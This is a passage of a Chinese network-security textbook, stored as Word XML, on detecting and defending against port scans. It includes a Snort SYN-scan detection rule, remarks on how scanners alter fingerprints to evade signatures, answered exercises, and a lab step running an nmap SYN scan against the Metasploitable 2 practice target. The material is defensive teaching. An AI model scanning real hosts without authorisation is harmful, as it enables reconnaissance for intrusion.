          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">窗口大小、TTL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">以及</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">选项排序组合，这些特征可被规则匹配。Snort/Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的相关检测能力将在本书第五卷第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章详述（交叉前指）。需要注意的是，扫描器可通过调整源端口、IP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID、TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时间戳等参数改变指纹，因此仅靠签名会漏判经过伪装的“低调扫描”。检测策略应坚持“统计异常为主，签名规则为辅”，并与其他告警关联分析。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御：限速、丢弃、欺骗——增加扫描成本</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测到扫描后，防御系统可采取多种主动与被动措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防火墙默认拒绝（Default</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Deny）策略</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：这是最基础的减少暴露面的方法——仅对外开放必要的业务端口，所有非显式允许的流量一律静默丢弃（DROP）而不回复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达。静默丢弃使攻击者无法区分“端口关闭”与“被防火墙过滤”，从而大大延长扫描时间并降低结果可信度。同时，防火墙应配置为不向不存在的服务返回任何</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">重置包，因为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本身就会确认主机的存活。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理：如果服务器不存在某一服务，但防火墙回复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">RST，攻击者就知道“有一个活动主机，但端口关闭”。而若回复为空（黑洞），则无法确定是主机不存在还是被过滤。——由此引发“网络黑洞”或“沉默防御”。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">限速与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> SYN Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：针对扫描可能导致的资源消耗，可在服务器操作系统中启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">机制。SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使服务器在收到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">时不立即分配完整的传输控制块（TCB），而是将连接状态编码到返回的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的初始序列号中，只有当收到最终</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">且验证</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">有效时才分配资源。这既抵御了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN flood DoS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击，也让大规模扫描无法消耗服务器内存（因为不分配</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TCB）。此外，防火墙或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS/IPS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可对源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进行速率限制：若某</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">每秒</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包超过阈值，则后续报文直接丢弃或延迟响应，迫使扫描器降低速度、延长扫描时间。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蜜罐与欺骗技术</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：主动防御手段是在网络中部署蜜罐——伪装成真实服务但实则隔离并全面监控的虚假系统。当扫描器触碰到蜜罐的端口时，蜜罐可产生虚假的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“端口开放”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回复，吸引攻击者深入，同时记录所有交互行为。这不仅能延缓攻击者对真实资产的扫描进度，还能在攻击者尚未造成实质损害前捕获其攻击工具和手法，为蓝队溯源提供情报。蜜罐端口往往模拟常见服务（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">22/tcp、80/tcp、3306/tcp），诱使攻击者将精力耗费在无价值的探测上。更高级的做法是结合“动态混淆”——如移动目标防御（MTD），周期性改变真实服务的端口或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">IP，使前期扫描结果迅速失效。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1063"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主动阻断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部分入侵防御系统（IPS）可与防火墙联动，一旦检测到扫描行为，即自动将扫描源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加入黑名单临时阻断所有流量（如通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BGP Flowspec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或简单的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> iptables </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则）。但需注意避免误伤：正常扫描行为（如内部网管工具、搜索引擎爬虫可能对多个端口进行连接）应纳入白名单，避免阻断合法业务。典型的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则片段如下（环境无关占位）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">alert tcp any any -&gt; &lt;HOME_NET&gt; any (msg:"Possible SYN Scan"; flags:S; detection_filter:track by_src, count 20, seconds 5; sid:1000001;)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">该规则表示：若某源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒内向内部网络发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个以上仅带</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">标志的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">报文，则告警。实际部署时需根据网络基线调整阈值。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">综上所述，蓝队对端口扫描的防御层次为：减少攻击面（防火墙最小化开放）→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">提高扫描代价（限速、SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Cookie）→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗误导（蜜罐）→</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">检测告警与联动阻断（IDS/IPS）。这种纵深防御迫使攻击者要么暴露自身，要么放弃目标。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="104"/>
    <w:bookmarkStart w:id="105" w:name="习题-5"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">习题</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">1：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">全连接扫描更“隐蔽”？请结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">状态机与系统日志行为说明。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">回顾</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节中两种扫描对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">三次握手的完成程度，以及操作系统通常在何时记录连接建立/登录事件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">TCP SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描（半开扫描）在收到目标返回的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN-ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后，不回复最终</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">完成握手，而是发送</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">复位连接。因此，从目标操作系统的视角看，这个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">连接从未完全建立，绝大多数应用程序（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器、SSH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">守护进程）不会记录未完成握手的连接，只有内核级别的连接追踪或特定防火墙日志才可能留下极短存活的“SYN_RECV”记录。而全连接扫描（connect</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描）完成完整的三次握手，随后又立即通过正常的四次挥手或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RST </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">关闭连接，应用层会记录一次完整的连接建立与断开过程，从而在服务日志中留下明显痕迹。因此，SYN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描更具“隐蔽性”——它在完成探测目标的同时，避免在应用日志中生成大量连接事件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">2：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为什么</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口扫描通常比</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描慢得多且结果不可靠？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">思考</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议的无连接特性，以及目标返回响应的条件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">解答：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是无连接协议，没有类似</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的三次握手和状态机。发送一个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> UDP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">探测包后，若目标端口关闭，协议规定目标应回复</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">“端口不可达”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消息，但很多系统会限制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">错误消息的生成速率（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">内核默认每秒仅发少量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP unreachable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包），防火墙也常过滤</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">不可达。若目标端口开放，但其上监听的服务不主动回复（或者服务对于未知请求不回应），则扫描器收不到任何反馈，无法区分“端口开放但无响应”与“探测包或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ICMP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">消息被过滤丢弃”两种情况。因此，UDP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描必须等待超时并重传多次，速度极慢，且结果充满不确定性，需结合应用层协议特定探测才能提高准确度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">靶机迁移任务：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">2（或同等授权靶机）上，用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">执行以下扫描类型并对比结果：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1064"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">TCP SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">扫描：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sS &lt;TARGET_IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
